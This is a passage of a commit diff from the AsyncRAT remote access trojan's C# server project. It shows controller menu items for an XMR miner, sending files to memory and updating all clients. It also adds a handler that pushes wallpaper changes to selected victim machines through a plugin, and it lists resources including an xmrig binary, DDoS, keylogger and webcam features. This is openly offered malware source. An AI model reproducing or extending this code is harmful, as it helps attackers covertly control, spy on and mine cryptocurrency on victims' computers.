this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
this.sENDFILETOMEMORYToolStripMenuItem1.Text = "SEND FILE TO MEMORY";
this.sENDFILETOMEMORYToolStripMenuItem1.Click += new System.EventHandler(this.SENDFILETOMEMORYToolStripMenuItem1_Click);
//
// minerToolStripMenuItem1
//
this.minerToolStripMenuItem1.Name = "minerToolStripMenuItem1";
this.minerToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
this.minerToolStripMenuItem1.Text = "XMR MINER";
this.minerToolStripMenuItem1.Click += new System.EventHandler(this.MinerToolStripMenuItem1_Click);
//
// uPDATEToolStripMenuItem1
//
this.uPDATEToolStripMenuItem1.Name = "uPDATEToolStripMenuItem1";
this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
this.uPDATEToolStripMenuItem1.Text = "UPDATE ALL CLIENTS";
this.uPDATEToolStripMenuItem1.Click += new System.EventHandler(this.UPDATEToolStripMenuItem1_Click);
//
// toolStripSeparator4
//
this.toolStripSeparator4.Name = "toolStripSeparator4";
this.toolStripSeparator4.Size = new System.Drawing.Size(246, 6);
//
// dELETETASKToolStripMenuItem
//
this.dELETETASKToolStripMenuItem.Name = "dELETETASKToolStripMenuItem";
this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
this.dELETETASKToolStripMenuItem.Text = "DELETE TASK";
this.dELETETASKToolStripMenuItem.Click += new System.EventHandler(this.DELETETASKToolStripMenuItem_Click);
//
// performanceCounter1
//
this.performanceCounter1.CategoryName = "Processor";
this.performanceCounter1.CounterName = "% Processor Time";
this.performanceCounter1.InstanceName = "_Total";
//
// performanceCounter2
//
this.performanceCounter2.CategoryName = "Memory";
this.performanceCounter2.CounterName = "% Committed Bytes In Use";
//
// notifyIcon1
//
this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
this.notifyIcon1.Text = "AsyncRAT";
this.notifyIcon1.Visible = true;
//
// TimerTask
//
this.TimerTask.Enabled = true;
this.TimerTask.Interval = 5000;
this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
//
// Form1 // Form1
// //
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@ -1027,7 +1039,7 @@
private System.Windows.Forms.ColumnHeader columnHeader2; private System.Windows.Forms.ColumnHeader columnHeader2;
private System.Diagnostics.PerformanceCounter performanceCounter1; private System.Diagnostics.PerformanceCounter performanceCounter1;
private System.Diagnostics.PerformanceCounter performanceCounter2; private System.Diagnostics.PerformanceCounter performanceCounter2;
public System.Windows.Forms.ColumnHeader lv_prefor; public System.Windows.Forms.ColumnHeader lv_act;
private System.Windows.Forms.ToolStripMenuItem aBOUTToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem aBOUTToolStripMenuItem;
private System.Windows.Forms.TabPage tabPage3; private System.Windows.Forms.TabPage tabPage3;
private System.Windows.Forms.ContextMenuStrip contextMenuThumbnail; private System.Windows.Forms.ContextMenuStrip contextMenuThumbnail;
@ -1103,6 +1115,7 @@
private System.Windows.Forms.ToolStripMenuItem minerToolStripMenuItem1; private System.Windows.Forms.ToolStripMenuItem minerToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem runToolStripMenuItem2; private System.Windows.Forms.ToolStripMenuItem runToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem stopToolStripMenuItem1; private System.Windows.Forms.ToolStripMenuItem stopToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem setWallpaperToolStripMenuItem;
} }
} }

37
AsyncRAT-C#/Server/Forms/Form1.cs
View File

@ -1062,6 +1062,42 @@ namespace Server
} }
} }
private void setWallpaperToolStripMenuItem_Click(object sender, EventArgs e)
{
try
{
if (listView1.SelectedItems.Count > 0)
{
using (OpenFileDialog openFileDialog = new OpenFileDialog())
{
openFileDialog.Filter = "All Graphics Types|*.bmp;*.jpg;*.jpeg;*.png";
if (openFileDialog.ShowDialog() == DialogResult.OK)
{
MsgPack packet = new MsgPack();
packet.ForcePathObject("Packet").AsString = "wallpaper";
packet.ForcePathObject("Image").SetAsBytes(File.ReadAllBytes(openFileDialog.FileName));
packet.ForcePathObject("Exe").AsString = Path.GetExtension(openFileDialog.FileName);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "plugin";
msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Extra.dll"));
msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
#endregion #endregion
#region System Client #region System Client
@ -1708,6 +1744,5 @@ namespace Server
[DllImport("uxtheme", CharSet = CharSet.Unicode)] [DllImport("uxtheme", CharSet = CharSet.Unicode)]
public static extern int SetWindowTheme(IntPtr hWnd, string textSubAppName, string textSubIdList); public static extern int SetWindowTheme(IntPtr hWnd, string textSubAppName, string textSubIdList);
} }
} }

9
AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
View File

@ -78,14 +78,7 @@ namespace Server.Handle_Packet
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Antivirus").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Antivirus").AsString);
client.LV.SubItems.Add("0000 MS"); client.LV.SubItems.Add("0000 MS");
try client.LV.SubItems.Add("...");
{
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString.Replace("MINER 0", "MINER Offline").Replace("MINER 1", "MINER Online"));
}
catch
{
client.LV.SubItems.Add("??");
}
client.LV.ToolTipText = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + Environment.NewLine; client.LV.ToolTipText = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + Environment.NewLine;
client.LV.ToolTipText += "[Pastebin] " + unpack_msgpack.ForcePathObject("Pastebin").AsString; client.LV.ToolTipText += "[Pastebin] " + unpack_msgpack.ForcePathObject("Pastebin").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString; client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;

2
AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
View File

@ -18,7 +18,7 @@ namespace Server.Handle_Packet
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
lock (Settings.LockListviewClients) lock (Settings.LockListviewClients)
if (client.LV != null) if (client.LV != null)
client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString.Replace("MINER 0", "MINER Offline").Replace("MINER 1", "MINER Online"); client.LV.SubItems[Program.form1.lv_act.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
else else
Debug.WriteLine("Temp socket pinged server"); Debug.WriteLine("Temp socket pinged server");
} }

10
AsyncRAT-C#/Server/Properties/Resources.Designer.cs generated
View File

@ -200,6 +200,16 @@ namespace Server.Properties {
} }
} }
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
internal static System.Drawing.Bitmap iconfinder_32_171485__1_ {
get {
object obj = ResourceManager.GetObject("iconfinder_32_171485 (1)", resourceCulture);
return ((System.Drawing.Bitmap)(obj));
}
}
/// <summary> /// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap. /// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary> /// </summary>

31
AsyncRAT-C#/Server/Properties/Resources.resx
View File

@ -181,9 +181,6 @@
<data name="uac" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="uac" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="process" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="pc" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="pc" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\pc.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\pc.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
@ -193,6 +190,9 @@
<data name="info" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="info" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\info.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\info.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="keyboard" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\keyboard.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="Miscellaneous" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="Miscellaneous" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\Miscellaneous.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\Miscellaneous.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
@ -202,6 +202,9 @@
<data name="xmr" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="xmr" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\xmr.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\xmr.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="keyboard-on" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\keyboard-on.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="msgbox" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="msgbox" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\msgbox.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\msgbox.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
@ -211,8 +214,8 @@
<data name="extra" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="extra" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\extra.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\extra.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="client" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="xmrig" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\client.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\xmrig.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data> </data>
<data name="monitoring-system" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="monitoring-system" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\monitoring-system.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\monitoring-system.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
@ -220,14 +223,17 @@
<data name="webcam" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="webcam" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\webcam.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\webcam.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="netstat" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\netstat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="tomem" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="tomem" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\tomem.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\tomem.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="ddos" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="ddos" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="netstat" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="process" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\netstat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="save-image2" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="save-image2" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\save-image2.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\save-image2.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
@ -244,16 +250,13 @@
<data name="chat" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="chat" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\chat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\chat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="xmrig" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="client" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\xmrig.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> <value>..\Resources\client.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="_7z1" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="_7z1" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\7z.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> <value>..\Resources\7z.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data> </data>
<data name="keyboard" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="iconfinder_32_171485 (1)" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\keyboard.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\iconfinder_32_171485 (1).png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="keyboard-on" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\keyboard-on.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
</root> </root>

BIN
AsyncRAT-C#/Server/Resources/iconfinder_32_171485 (1).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 924 B

1
AsyncRAT-C#/Server/Server.csproj
View File

@ -350,6 +350,7 @@
<ItemGroup> <ItemGroup>
<Content Include="async_icon.ico" /> <Content Include="async_icon.ico" />
<Content Include="ILMergeOrder.txt" /> <Content Include="ILMergeOrder.txt" />
<None Include="Resources\iconfinder_32_171485 %281%29.png" />
<None Include="Resources\keyboard-on.png" /> <None Include="Resources\keyboard-on.png" />
<None Include="Resources\keyboard.png" /> <None Include="Resources\keyboard.png" />
<None Include="Resources\7z.dll" /> <None Include="Resources\7z.dll" />